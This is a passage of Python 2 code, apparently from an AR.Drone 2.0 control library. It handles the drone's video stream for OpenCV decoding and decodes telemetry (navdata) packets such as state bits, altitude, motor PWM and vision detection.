reset = False
burstFrameCount = 0
else:
parent_pipe.send(cmd)
### Grabs the Videostream and store it in a fifo-pipe for decoding.
# The decoder has to guess the videostream-format which takes around 266 video-frames.
# So the stream is preprocessed, I-Frames will cut out while initiation and a flood of copies
# will be send to the decoder, till the proper decoder for the videostream is found.
# In case of a slow or midspeed-video, only a single or a few copied I-frames are sent to the decoder.
if ip == vstream_pipe:
receiveWatchdog = threading.Timer(2.0, VideoReceiveWatchdog, [parent_pipe,"Video Mainloop", debugV,]) # Resets video if something hangs
receiveWatchdog.start()
videoPackage = vstream_pipe.recv(65535)
receiveWatchdog.cancel()
if len(videoPackage) == 0: commitsuicideV = True
else:
if inited and not reset:
if unsureMode: ### An MPEG4-Stream is not confirmed, fallback to savemode ?
if not searchCodecTime and not len(VidStreamSnippet): # Video is freshly initiated
searchCodecTime = time.time()
if (time.time()-searchCodecTime) < 0.15: # Collecting VidStreamSnipped for later use
VidStreamSnippet+=videoPackage
if (time.time()-searchCodecTime) > 2.0: # Waited too long for an MPEG4 stream confirmation...
saveVideo = True # ... fall back to savemode
parent_pipe.send("saveVideo") # Inform the main process
unsureMode = False
foundCodec = True # switch off codec guess speed-up
if not saveVideo:
# if len(videoPackage) == 0: commitsuicideV = True
# else:
if videoPackage[31:40].find("\x00\x00\x00")>3: # Found a new MPEG4-Frame
FrameCount+=1
### Processing the last frame
if iFrame: # If the last frame was an I-frame
VidStreamSnippet = rawVideoFrame # ... save it as VideoStreamSnippet for later use
if foundCodec: # OpenCV guessed the used Codec
if slowVideo: # Send just the iFrame (openCV stores about 5 in its queue),
for i in range(0,frameRepeat,1): # ... so repeat for less delay in midVideo()-mode
write2pipe.write(VidStreamSnippet)
iFrame = False
else: pass
if not slowVideo: # For all last Frames
if foundCodec:
try: write2pipe.write(rawVideoFrame)
except: pass
if not foundCodec: # Flood the pipe with the last iFrames, so that openCV can guess the codec faster
for i in range(0,5):
try:
write2pipe.write(rawVideoFrame)
burstFrameCount+=1
except: pass
### Processing new Frames
if ord(videoPackage[30]) == 1: #### Found an I-Frame
rawVideoFrame = "" # Delete the data previous to the first iFrame
unsureMode,iFrame = False, True
elif ord(videoPackage[30]) == 3: #### Found a P-Frame
unsureMode = False
else: #### Found an odd h264-frametype
if debugV:
print "*** Odd h264 Frametype: ",FrameCount,
for i in range(31,43,1): print ord(videoPackage[i]),
print " - ",videoPackage[31:40].find("\x00\x00\x00"),ord(videoPackage[30])
rawVideoFrame = ""
### Collecting data for the next frame from stream
rawVideoFrame+=videoPackage
else: #(saveVideo-Mode)
if foundCodec: write2pipe.write(videoPackage)
else:
for i in range(0,2):
write2pipe.write(VidStreamSnippet)
burstFrameCount+=1
if not foundCodec and burstFrameCount>350:
parent_pipe.send(("reset",0,0,0))
burstFrameCount=0
if debugV: print "To many pictures send while guessing the codec. Resetting."
try:
vstream_pipe.shutdown(socket.SHUT_RDWR)
vstream_pipe.close()
except: pass
try: write2pipe.close()
except: pass
try: vstream_pipe.close()
except: pass
try:
VidPipe=open(VidPipePath,"r")
r = "1"
while len(r): r=VidPipe.read()
FIFO.close()
except: pass
try: os.remove(VidPipePath)
except: pass
if debugV: print "Video-Process : committed suicide"
##################################################################################################
###### Receive and Decode NavData ######
##################################################################################################
### Description:
### It follows lousy code for abetter documentation! Later there will be lousy code because of laziness; I will correct it later....maybe.
### You will (normally) find the names of the official AR.drone SDK 2.0, some comments and the official data type of that value.
### A lot of entries are reversed engineered; for some, I have no idea what they are doing or what their meaning is.
### It would be nice if you could give me a hint if you have some further information.
##### Header ##################################################################
def decode_Header(data):
#Bit 00-07: FLY_MASK, VIDEO_MASK, VISION_MASK, CONTROL_MASK, ALTITUDE_MASK, USER_FEEDBACK_START, COMMAND_MASK, CAMERA_MASK
#Bit 08-15: TRAVELLING_MASK, USB_MASK, NAVDATA_DEMO_MASK, NAVDATA_BOOTSTRAP, MOTORS_MASK, COM_LOST_MASK, SOFTWARE_FAULT, VBAT_LOW
#Bit 16-23: USER_EL, TIMER_ELAPSED, MAGNETO_NEEDS_CALIB, ANGLES_OUT_OF_RANGE, WIND_MASK, ULTRASOUND_MASK, CUTOUT_MASK, PIC_VERSION_MASK
#Bit 24-31: ATCODEC_THREAD_ON, NAVDATA_THREAD_ON, VIDEO_THREAD_ON, ACQ_THREAD_ON, CTRL_WATCHDOG_MASK, ADC_WATCHDOG_MASK, COM_WATCHDOG_MASK, EMERGENCY_MASK
stateBit = [0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0]
stateBit[ 0] = data[1] &1 # 0: FLY MASK : (0) ardrone is landed, (1) ardrone is flying
stateBit[ 1] = data[1]>> 1&1 # 1: VIDEO MASK : (0) video disable, (1) video enable
stateBit[ 2] = data[1]>> 2&1 # 2: VISION MASK : (0) vision disable, (1) vision enable
stateBit[ 3] = data[1]>> 3&1 # 3: CONTROL ALGO : (0) euler angles control, (1) angular speed control
stateBit[ 4] = data[1]>> 4&1 # 4: ALTITUDE CONTROL ALGO : (0) altitude control inactive (1) altitude control active
stateBit[ 5] = data[1]>> 5&1 # 5: USER feedback : Start button state
stateBit[ 6] = data[1]>> 6&1 # 6: Control command ACK : (0) None, (1) one received
stateBit[ 7] = data[1]>> 7&1 # 7: CAMERA MASK : (0) camera not ready, (1) Camera ready
stateBit[ 8] = data[1]>> 8&1 # 8: Travelling mask : (0) disable, (1) enable
stateBit[ 9] = data[1]>> 9&1 # 9: USB key : (0) usb key not ready, (1) usb key ready
stateBit[10] = data[1]>>10&1 # 10: Navdata demo : (0) All navdata, (1) only navdata demo
stateBit[11] = data[1]>>11&1 # 11: Navdata bootstrap : (0) options sent in all or demo mode, (1) no navdata options sent
stateBit[12] = data[1]>>12&1 # 12: Motors status : (0) Ok, (1) Motors problem
stateBit[13] = data[1]>>13&1 # 13: Communication Lost : (0) Com is ok, (1) com problem
stateBit[14] = data[1]>>14&1 # 14: Software fault detected - user should land as quick as possible (1)
stateBit[15] = data[1]>>15&1 # 15: VBat low : (0) Ok, (1) too low
stateBit[16] = data[1]>>16&1 # 16: User Emergency Landing : (0) User EL is OFF, (1) User EL is ON
stateBit[17] = data[1]>>17&1 # 17: Timer elapsed : (0) not elapsed, (1) elapsed
stateBit[18] = data[1]>>18&1 # 18: Magnetometer calib state : (0) Ok, no calibration needed, (1) not ok, calibration needed
stateBit[19] = data[1]>>19&1 # 19: Angles : (0) Ok, (1) out of range
stateBit[20] = data[1]>>20&1 # 20: WIND MASK: (0) Ok, (1) Too much wind
stateBit[21] = data[1]>>21&1 # 21: Ultrasonic sensor : (0) Ok, (1) deaf
stateBit[22] = data[1]>>22&1 # 22: Cutout system detection : (0) Not detected, (1) detected
stateBit[23] = data[1]>>23&1 # 23: PIC Version number OK : (0) a bad version number, (1) version number is OK
stateBit[24] = data[1]>>24&1 # 24: ATCodec thread ON : (0) thread OFF, (1) thread ON
stateBit[25] = data[1]>>25&1 # 25: Navdata thread ON : (0) thread OFF, (1) thread ON
stateBit[26] = data[1]>>26&1 # 26: Video thread ON : (0) thread OFF, (1) thread ON
stateBit[27] = data[1]>>27&1 # 27: Acquisition thread ON : (0) thread OFF, (1) thread ON
stateBit[28] = data[1]>>28&1 # 28: CTRL watchdog : (0) control is well scheduled, (1) delay in control execution (> 5ms)
stateBit[29] = data[1]>>29&1 # 29: ADC Watchdog : (0) uart2 is good, (1) delay in uart2 dsr (> 5ms)
stateBit[30] = data[1]>>30&1 # 30: Communication Watchdog : (0) Com is ok, (1) com problem
stateBit[31] = data[1]>>31&1 # 31: Emergency landing : (0) no emergency, (1) emergency
stateBit[32] = data[2]
stateBit[33] = data[3]
# Alternative code:
# for i in range (0,32,1): arState[i]=data>>i&1
return (stateBit)
##### ID = 0 ### "demo" #######################################################
def decode_ID0(packet): # NAVDATA_DEMO_TAG
dataset = struct.unpack_from("HHIIfffifffIffffffffffffIIffffffffffff", packet, 0)
if dataset[1] != 148: print "*** ERROR : Navdata-Demo-Options-Package (ID=0) has the wrong size !!!"
demo=[[0,0,0,0,0,0,0,0,0,0,0,0],0,[0,0,0],0,[0,0,0],0,[0,0,0,0,0,0,0,0,0],[0,0,0],0,0,[0,0,0,0,0,0,0,0,0],[0,0,0]]
demo[0][ 0] = dataset[2]>>15&1 # DEFAULT (bool)
demo[0][ 1] = dataset[2]>>16&1 # INIT (bool)
demo[0][ 2] = dataset[2]>>17&1 # LANDED (bool)
demo[0][ 3] = dataset[2]>>18&1 # FLYING (bool)
demo[0][ 4] = dataset[2]>>19&1 # HOVERING (bool) (Seems like landing)
demo[0][ 5] = dataset[2]>>20&1 # TEST (bool)
demo[0][ 6] = dataset[2]>>21&1 # TRANS_TAKEOFF (bool)
demo[0][ 7] = dataset[2]>>22&1 # TRANS_GOFIX (bool)
demo[0][ 8] = dataset[2]>>23&1 # TRANS_LANDING (bool)
demo[0][ 9] = dataset[2]>>24&1 # TRANS_LOOPING (bool)
demo[0][10] = dataset[2]>>25&1 # TRANS_NO_VISION (bool)
demo[0][11] = dataset[2]>>26&1 # NUM_STATE (bool)
demo[1] =dataset[3] # vbat_flying_percentage battery voltage (filtered) in percent (uint32)
demo[2][0] =dataset[4]/1000.0 # theta pitch in degrees (float)
demo[2][1] =dataset[5]/1000.0 # phi roll in degrees (float)
demo[2][2] =dataset[6]/1000.0 # psi yaw in degrees (float)
demo[3] =dataset[7]/10.0 # altitude altitude in centimetres (int32)
demo[4][0] =dataset[8] # vx estimated speed in X in mm/s (float)
demo[4][1] =dataset[9] # vy estimated speed in Y in mm/s (float)
demo[4][2] =dataset[10] # vz estimated speed in Z in mm/s (float)
demo[5] =dataset[11] # num_frames streamed frame index (uint32) (Not used to integrate in video stage)
for i in range (0,9,1): demo[6][i] = dataset[12+i] # detection_camera_rot Camera parameters compute by detection (float matrix33)
for i in range (0,3,1): demo[7][i] = dataset[21+i] # detection_camera_trans Deprecated ! Don't use ! (float vector31)
demo[8] = dataset[24] # detection_tag_index Deprecated ! Don't use ! (uint32)
demo[9] = dataset[25] # detection_camera_type Type of tag (uint32)
for i in range (0,9,1): demo[10][i] = dataset[26+i] # drone_camera_rot Camera parameters computed by drone (float matrix33)
for i in range (0,3,1): demo[11][i] = dataset[35+i] # drone_camera_trans Deprecated ! Don't use ! (float vector31)
return(demo)
##### ID = 1 ### "time" #######################################################
def decode_ID1(packet): #NAVDATA_TIME_TAG
dataset = struct.unpack_from("HHI", packet, 0)
if dataset[1] != 8: print "*** ERROR : navdata-time-Options-Package (ID=1) has the wrong size !!!"
time=[0.0]
# Value: 11 most significant bits represent the seconds, and the 21 least significant bits represent the microseconds.
for i in range(0,21,1): time[0] += ((dataset[2]>>i&1)*(2**i)) # Calculating the millisecond-part
time[0] /= 1000000
for i in range(21,32,1): time[0] += (dataset[2]>>i&1)*(2**(i-21)) # Calculating second-part
return(time)
##### ID = 2 ### "raw_measures" ################################################
def decode_ID2(packet): #NAVDATA_RAW_MEASURES_TAG
dataset = struct.unpack_from("HHHHHhhhhhIHHHHHHHHHHHHhh", packet, 0)
if dataset[1] != 52: print "*** ERROR : navdata-raw_measures-Options-Package (ID=2) has the wrong size !!!"
raw_measures = [[0,0,0],[0,0,0],[0,0],0,0,0,0,0,0,0,0,0,0,0,0,0]
for i in range(0,3,1): raw_measures[0][i] = dataset[2+i] # raw_accs[xyz] filtered accelerometer-datas [LSB] (uint16)
for i in range(0,3,1): raw_measures[1][i] = dataset[5+i] # raw_gyros[xyz] filtered gyrometer-datas [LSB] (int16)
for i in range(0,2,1): raw_measures[2][i] = dataset[8+i] # raw_gyros_110[xy] gyrometers x/y 110 deg/s [LSB] (int16)
raw_measures[ 3] = dataset[10] # vbat_raw battery voltage raw (mV) (uint)
raw_measures[ 4] = dataset[11] # us_debut_echo [LSB] (uint16)
raw_measures[ 5] = dataset[12] # us_fin_echo [LSB] (uint16)
raw_measures[ 6] = dataset[13] # us_association_echo [LSB] (uint16)
raw_measures[ 7] = dataset[14] # us_distance_echo [LSB] (uint16)
raw_measures[ 8] = dataset[15] # us_courbe_temps [LSB] (uint16)
raw_measures[ 9] = dataset[16] # us_courbe_valeur [LSB] (uint16)
raw_measures[10] = dataset[17] # us_courbe_ref [LSB] (uint16)
raw_measures[11] = dataset[18] # flag_echo_ini [LSB] (uint16)
raw_measures[12] = dataset[19] # nb_echo [LSB] (uint16)
raw_measures[13] = dataset[21] # sum_echo juRef_st lower 16Bit, upper 16Bit=tags? (uint32)
raw_measures[14] = dataset[23] # alt_temp_raw in Milimeter (just lower 16Bit) (int32)
raw_measures[15] = dataset[24] # gradient [LSB] (int16)
return(raw_measures)
##### ID = 3 ### "phys_measures" ##############################################
def decode_ID3(packet): #NAVDATA_PHYS_MEASURES_TAG
dataset = struct.unpack_from("HHfHffffffIII", packet, 0)
if dataset[1] != 46: print "*** ERROR : navdata-phys_measures-Options-Package (ID=3) has the wrong size !!!"
phys_measures = [0,0,[0,0,0],[0,0,0],0,0,0]
phys_measures[0] = dataset[2] #float32 accs_temp
phys_measures[1] = dataset[3] #uint16 gyro_temp
phys_measures[4] = dataset[10] #uint32 alim3V3 3.3volt alim [LSB]
phys_measures[5] = dataset[11] #uint32 vrefEpson ref volt Epson gyro [LSB]
phys_measures[6] = dataset[12] #uint32 vrefIDG ref volt IDG gyro [LSB]
dataset = struct.unpack_from(">HHfHffffffIII", packet, 0) #switch from little to big-endian
for i in range(0,3,1): phys_measures[2][i] = dataset[4+i] #float32 phys_accs[xyz]
for i in range(0,3,1): phys_measures[3][i] = dataset[7+i] #float32 phys_gyros[xyz]
return(phys_measures)
##### ID = 4 ### "gyros_offsets" ##############################################
def decode_ID4(packet): #NNAVDATA_GYROS_OFFSETS_TAG
dataset = struct.unpack_from("HHfff", packet, 0)
if dataset[1] != 16: print "*** ERROR : navdata-gyros_offsets-Options-Package (ID=4) has the wrong size !!!"
gyros_offsets = [0,0,0]
for i in range (0,3,1): gyros_offsets[i]=dataset[i+2] # offset_g[xyz] in deg/s (float)
return(gyros_offsets)
##### ID = 5 ### "euler_angles" ###############################################
def decode_ID5(packet): #NAVDATA_EULER_ANGLES_TAG
dataset = struct.unpack_from("HHff", packet, 0)
if dataset[1] != 12: print "*** ERROR : navdata-euler_angles-Options-Package (ID=5) has the wrong size !!!"
euler_angles = [0,0]
euler_angles[0] = dataset[2] #float32 theta_a (head/back)
euler_angles[1] = dataset[3] #float32 phi_a (sides)
return(euler_angles)
##### ID = 6 ### "references" #################################################
def decode_ID6(packet): #NAVDATA_REFERENCES_TAG
dataset = struct.unpack_from("HHiiiiiiiiffffffIfffffI", packet, 0)
if dataset[1] != 88: print "*** ERROR : navdata-references-Options-Package (ID=6) has the wrong size !!!"
references = [[0,0,0],[0,0],[0,0,0],[0.0,0.0],[0.0,0.0],[0.0,0.0],0,[0.0,0.0,0.0,0.0,0.0,0]]
references[0][0] = dataset[2] #ref_theta Theta_ref_embedded [milli-deg] (int32)
references[0][1] = dataset[3] #ref_phi Phi_ref_embedded [milli-deg] (int32)
references[0][2] = dataset[9] #ref_psi Psi_ref_embedded [milli-deg] (int32)
references[1][0] = dataset[4] #ref_theta_I Theta_ref_int [milli-deg] (int32)
references[1][1] = dataset[5] #ref_phi_I Phi_ref_int [milli-deg] (int32)
references[2][0] = dataset[6] #ref_pitch Pitch_ref_embedded [milli-deg] (int32)
references[2][1] = dataset[7] #ref_roll Roll_ref_embedded [milli-deg] (int32)
references[2][2] = dataset[8] #ref_yaw Yaw_ref_embedded [milli-deg/s] (int32)
references[3][0] = dataset[10] #vx_ref Vx_Ref_[mm/s] (float)
references[3][1] = dataset[11] #vy_ref Vy_Ref_[mm/s] (float)
references[4][0] = dataset[12] #theta_mod Theta_modele [radian] (float)
references[4][1] = dataset[13] #phi_mod Phi_modele [radian] (float)
references[5][0] = dataset[14] #k_v_x (float)
references[5][1] = dataset[15] #k_v_y (float)
references[6] = dataset[16] #k_mode (uint32)
references[7][0] = dataset[17] #ui_time (float)
references[7][1] = dataset[18] #ui_theta (float)
references[7][2] = dataset[19] #ui_phi (float)
references[7][3] = dataset[20] #ui_psi (float)
references[7][4] = dataset[21] #ui_psi_accuracy (float)
references[7][5] = dataset[22] #ui_seq (int32)
return(references)
##### ID = 7 ### "trims" ######################################################
def decode_ID7(packet): #NAVDATA_TRIMS_TAG
dataset = struct.unpack_from("HHfff", packet, 0)
if dataset[1] != 16: print "*** ERROR : navdata-trims-Options-Package (ID=7) has the wrong size !!!"
trims = [0,0,0]
trims[0] = dataset[2] # angular_rates_trim (float)
trims[1] = dataset[3] # euler_angles_trim_theta [milli-deg] (float)
trims[2] = dataset[4] # euler_angles_trim_phi [milli-deg] (float)
return(trims)
##### ID = 8 ### "rc_references" ##############################################
def decode_ID8(packet): #NAVDATA_RC_REFERENCES_TAG
dataset = struct.unpack_from("HHiiiii", packet, 0)
if dataset[1] != 24: print "*** ERROR : navdata-rc_references-Options-Package (ID=8) has the wrong size !!!"
rc_references = [0,0,0,0,0]
rc_references[0] = dataset[2] # rc_ref_pitch Pitch_rc_embedded (int32)
rc_references[1] = dataset[3] # rc_ref_roll Roll_rc_embedded (int32)
rc_references[2] = dataset[4] # rc_ref_yaw Yaw_rc_embedded (int32)
rc_references[3] = dataset[5] # rc_ref_gaz Gaz_rc_embedded (int32)
rc_references[4] = dataset[6] # rc_ref_ag Ag_rc_embedded (int32)
return(rc_references)
##### ID = 9 ### "pwm" ########################################################
def decode_ID9(packet): #NAVDATA_PWM_TAG
dataset = struct.unpack_from("HHBBBBBBBBffffiiifiiifHHHHff", packet, 0)
if dataset[1] != 76 and dataset[1] != 92: #92 since firmware 2.4.8 ?
print "*** ERROR : navdata-navdata_pwm-Options-Package (ID=9) has the wrong size !!!"
#print "Soll: 76 Ist:",dataset[1]
pwm = [[0,0,0,0],[0,0,0,0],0.0,0.0,0.0,0.0,[0,0,0],0.0,[0,0,0,0.0],[0,0,0,0],0.0,0.0]
for i in range(0,4,1): pwm[0][i] = dataset[2+i] # motor1/2/3/4 [Pulse-width mod] (uint8)
for i in range(0,4,1): pwm[1][i] = dataset[6+i] # sat_motor1/2/3/4 [Pulse-width mod] (uint8)
pwm[2] = dataset[10] # gaz_feed_forward [Pulse-width mod] (float)
pwm[3] = dataset[11] # gaz_altitud [Pulse-width mod] (float)
pwm[4] = dataset[12] # altitude_integral [mm/s] (float)
pwm[5] = dataset[13] # vz_ref [mm/s] (float)
pwm[6][0] = dataset[14] # u_pitch [Pulse-width mod] (int32)
pwm[6][1] = dataset[15] # u_roll [Pulse-width mod] (int32)
pwm[6][2] = dataset[16] # u_yaw [Pulse-width mod] (int32)
pwm[7] = dataset[17] # yaw_u_I [Pulse-width mod] (float)
pwm[8][0] = dataset[18] # u_pitch_planif [Pulse-width mod] (int32)
pwm[8][1] = dataset[19] # u_roll_planif [Pulse-width mod] (int32)
pwm[8][2] = dataset[20] # u_yaw_planif [Pulse-width mod] (int32)
pwm[8][3] = dataset[21] # u_gaz_planif [Pulse-width mod] (float)
for i in range(0,4,1):
pwm[9][i] = dataset[22+i] # current_motor1/2/3/4 [mA] (uint16)
pwm[10] = dataset[26] # altitude_prop [Pulse-width mod] (float)
pwm[11] = dataset[27] # altitude_der [Pulse-width mod] (float)
return(pwm)
##### ID = 10 ### "altitude" ###################################################
def decode_ID10(packet): #NAVDATA_ALTITUDE_TAG
dataset = struct.unpack_from("HHifiiffiiiIffI", packet, 0)
if dataset[1] != 56: print "*** ERROR : navdata-navdata_altitude-Options-Package (ID=10) has the wrong size !!!"
altitude = [0,0.0,0,0,0.0,0.0,[0,0,0],0,[0,0],0]
altitude[0] = dataset[2] # altitude_vision [mm] (int32)
altitude[1] = dataset[3] # altitude_vz [mm/s] (float)
altitude[2] = dataset[4] # altitude_ref [mm] (int32)
altitude[3] = dataset[5] # altitude_raw [mm] (int32)
altitude[4] = dataset[6] # obs_accZ Observer AccZ [m/s2] (float)
altitude[5] = dataset[7] # obs_alt Observer altitude US [m](float)
for i in range (0,3,1):
altitude[6][i] = dataset[8+i] # obs_x 3-Vector (int32)
altitude[7] = dataset[11] # obs_state Observer state [-] (uint32)
for i in range (0,2,1):
altitude[8][i] = dataset[12+i] # est_vb 2-Vector (float)
altitude[9] = dataset[14] # est_state Observer flight state (uint32)
return(altitude)
##### ID = 11 ### "vision_raw" #################################################
def decode_ID11(packet): #NAVDATA_VISION_RAW_TAG
dataset = struct.unpack_from("HHfff", packet, 0)
if dataset[1] != 16: print "*** ERROR : navdata-vision_raw-Options-Package (ID=11) has the wrong size !!!"
vision_raw = [0,0,0]
for i in range (0,3,1): vision_raw[i] = dataset[2+i] # vision_tx_raw (xyz) (float)
return(vision_raw)
##### ID = 12 ### "vision_of" #################################################
def decode_ID12(packet): #NAVDATA_VISION_OF_TAG
dataset = struct.unpack_from("HHffffffffff", packet, 0)
if dataset[1] != 44: print "*** ERROR : navdata-vision_of-Options-Package (ID=12) has the wrong size !!!"
vision_of = [[0.0,0.0,0.0,0.0,0.0],[0.0,0.0,0.0,0.0,0.0]]
for i in range (0,5,1): vision_of[0][i] = dataset[2+i] # of_dx[5] (float)
for i in range (0,5,1): vision_of[1][i] = dataset[7+i] # of_dy[5] (float)
return(vision_of)
##### ID = 13 ### "vision" #####################################################
def decode_ID13(packet): #NAVDATA_VISION_TAG
dataset = struct.unpack_from("HHIiffffifffiIffffffIIff", packet, 0)
if dataset[1] != 92: print "*** ERROR : navdata-vision-Options-Package (ID=13) has the wrong size !!!"
vision=[0,0,0.0,0.0,0.0,0.0,0,[0.0,0.0,0.0],0,0.0,[0.0,0.0,0.0],[0.0,0.0,0.0],0,0,[0.0,0.0]]
vision[0] = dataset[2] # vision_state FIXME: What are the meanings of the tags ?
vision[1] = dataset[3] # vision_misc (int32)
vision[2] = dataset[4] # vision_phi_trim (float)
vision[3] = dataset[5] # vision_phi_ref_prop (float)
vision[4] = dataset[6] # vision_theta_trim (float)
vision[5] = dataset[7] # vision_theta_ref_prop (float)
vision[6] = dataset[8] # new_raw_picture (int32)
for i in range (0,3,1):
vision[7][i] = dataset[9+i] # theta/phi/psi_capture (float)
vision[8] = dataset[12] # altitude_capture (int32)
for i in range (0,21,1): # Calculating milisecond-part
vision[9] += ((dataset[13]>>i&1)*(2**i))
vision[9] /= 1000000
for i in range (21,32,1): # Calculating second-part
vision[9] += (dataset[13]>>i&1)*(2**(i-21)) # time_capture (float)
for i in range (0,3,1):
vision[10][i] = dataset[14+i] # velocities[xyz] (float)
for i in range (0,3,1):
vision[11][i] = dataset[17+i] # delta_phi/theta/psi (float)
vision[12] = dataset[20] # gold_defined (uint32)
vision[13] = dataset[21] # gold_reset (uint32)
vision[14][0] = dataset[22] # gold_x (float)
vision[14][1] = dataset[23] # gold_y (float)
return(vision)
##### ID = 14 ### "vision_perf" ###############################################
def decode_ID14(packet): #NAVDATA_VISION_PERF_TAG
dataset = struct.unpack_from("HHffffffffffffffffffffffffff", packet, 0)
if dataset[1] != 108: print "*** ERROR : navdata-vision_of-Options-Package (ID=14) has the wrong size !!!"
vision_perf=[0.0,0.0,0.0,0.0,0.0,0.0,[0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0]]
vision_perf[0] = dataset[2] # time_szo (float)
vision_perf[1] = dataset[3] # time_corners (float)
vision_perf[2] = dataset[4] # time_compute (float)
vision_perf[3] = dataset[5] # time_tracking (float)
vision_perf[4] = dataset[6] # time_trans (float)
vision_perf[5] = dataset[7] # time_update (float)
for i in range (0,20,1):
vision_perf[6][i] = dataset[8+i] # time_custom[20] (float)
return(vision_perf)
##### ID = 15 ### "trackers_send" #############################################
def decode_ID15(packet): #NAVDATA_TRACKERS_SEND_TAG
dataset = struct.unpack_from("HHiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiii", packet, 0)
if dataset[1] != 364: print "*** ERROR : navdata-trackers_send-Options-Package (ID=15) has the wrong size !!!"
DEFAULT_NB_TRACKERS_WIDTH = 6
DEFAULT_NB_TRACKERS_HEIGHT = 5
limit = DEFAULT_NB_TRACKERS_WIDTH*DEFAULT_NB_TRACKERS_HEIGHT
trackers_send = [[0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0],[[0,0],[0,0],[0,0],[0,0],[0,0],[0,0],[0,0],[0,0],[0,0],[0,0],[0,0],[0,0],[0,0],[0,0],[0,0],[0,0],[0,0],[0,0],[0,0],[0,0],[0,0],[0,0],[0,0],[0,0],[0,0],[0,0],[0,0],[0,0],[0,0],[0,0]]]
for i in range (0, limit, 1):
trackers_send[0][i] = dataset[2+i] # locked[limit] (int32)
for i in range (0, limit, 1):
trackers_send[1][i][0] = dataset[32+(i*2)] # point[x[limit],y[limit]] (int32)
trackers_send[1][i][1] = dataset[33+(i*2)]
return(trackers_send)
##### ID = 16 ### "vision_detect" #############################################
def decode_ID16(packet): #NAVDATA_VISION_DETECT_TAG
dataset = struct.unpack_from("HHIIIIIIIIIIIIIIIIIIIIIIIIIffffIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIII", packet, offsetND)
if dataset[1] != 328: print "*** ERROR : navdata-vision_detect-Package (ID=16) has the wrong size !!!"
vision_detect = [0,[0,0,0,0],[0,0,0,0],[0,0,0,0],[0,0,0,0],[0,0,0,0],[0,0,0,0],[0.0,0.0,0.0,0.0],[[0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0],[0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0],[0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0],[0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0]],[[0.0,0.0,0.0],[0.0,0.0,0.0],[0.0,0.0,0.0],[0.0,0.0,0.0]],[0,0,0,0]]
#Max marker detection in one picture: 4
vision_detect[0] = dataset[2] # nb_detected (uint32)
for i in range (0,4,1): vision_detect[1][i] = dataset[3+i] # type[4] (uint32)
for i in range (0,4,1): vision_detect[2][i] = dataset[7+i] # xc[4] (uint32)
for i in range (0,4,1): vision_detect[3][i] = dataset[11+i] # yc[4] (uint32)
for i in range (0,4,1): vision_detect[4][i] = dataset[15+i] # width[4] (uint32)
for i in range (0,4,1): vision_detect[5][i] = dataset[19+i] # height[4] (uint32)
for i in range (0,4,1): vision_detect[6][i] = dataset[23+i] # dist[4] (uint32)
for i in range (0,4,1): vision_detect[7][i] = dataset[27+i] # orientation_angle[4] (float)
for i in range (0,4,1):
for j in range (0,9,1): vision_detect[8][i][j] = dataset[31+i+j] # rotation[4] (float 3x3 matrix (11,12,13,21,...)
for i in range (0,4,1):
for j in range (0,3,1): vision_detect[9][i][j] = dataset[67+i+j] # rotation[4] (float 3 vector)
for i in range (0,4,1): vision_detect[10][i] = dataset[79+i] # camera_source[4] (uint32)
return(vision_detect)
##### ID = 17 ### "watchdog" ###################################################
def decode_ID17(packet): #NAVDATA_WATCHDOG_TAG
dataset = struct.unpack_from("HHI", packet, offsetND)
if dataset[1] != 8: print "*** ERROR : navdata-watchdog-Package (ID=17) has the wrong size !!!"
watchdog = dataset[2] # watchdog Watchdog controll [-] (uint32)
return(watchdog)
##### ID = 18 ### "adc_data_frame" #############################################
def decode_ID18(packet): #NAVDATA_ADC_DATA_FRAME_TAG
dataset = struct.unpack_from("HHIBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBB", packet, offsetND)
if dataset[1] != 40: print "*** ERROR : navdata-adc_data_frame-Package (ID=18) has the wrong size !!!"
adc_data_frame = [0,[0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0]]
adc_data_frame[0] = dataset[2] # version (uint32)
for i in range (0,32,1): adc_data_frame[1][i] = dataset[3+i] # data_frame[32] (uint8)
return(adc_data_frame)
##### ID = 19 ### "video_stream" ###############################################
def decode_ID19(packet): #NAVDATA_VIDEO_STREAM_TAG
dataset = struct.unpack_from("HHBIIIIfIIIiiiiiII", packet, offsetND)
if dataset[1] != 65: print "*** ERROR : navdata-video_stream-Package (ID=19) has the wrong size !!!"
video_stream = [0,0,0,0,0,0.0,0,0,0,[0,0,0,0,0],0,0]
video_stream[0] = dataset[2] # quant quantizer reference used to encode [1:31] (uint8)
video_stream[1] = dataset[3] # frame_size frame size in bytes (uint32)
video_stream[2] = dataset[4] # frame_number frame index (uint32)
video_stream[3] = dataset[5] # atcmd_ref_seq atmcd ref sequence number (uint32)
video_stream[4] = dataset[6] # atcmd_mean_ref_gap mean time between two consecutive atcmd_ref (ms) (uint32)
video_stream[5] = dataset[7] # atcmd_var_ref_gap (float)
video_stream[6] = dataset[8] # atcmd_ref_quality estimator of atcmd link quality (uint32)
#Drone 2.0:
video_stream[7] = dataset[9] # out_bitrate measured out throughput from the video tcp socket (uint32)
video_stream[8] = dataset[10] # desired_bitrate last frame size generated by the video encoder (uint32)
for i in range (0,5,1): video_stream[9][i] = dataset[11+i] # data misc temporary data (int32)
video_stream[10] = dataset[16] # tcp_queue_level queue usage (uint32)
video_stream[11] = dataset[17] # fifo_queue_level queue usage (uint32)
return(video_stream)
##### ID = 20 ### "games" ######################################################
def decode_ID20(packet): #NAVDATA_GAMES_TAG
dataset = struct.unpack_from("HHII", packet, offsetND)
if dataset[1] != 12: print "*** ERROR : navdata-games-Package (ID=20) has the wrong size !!!"
games = [0,0]
games[0] = dataset[2] # double_tap_counter (uint32)
games[1] = dataset[3] # finish_line_counter (uint32)
return(games)
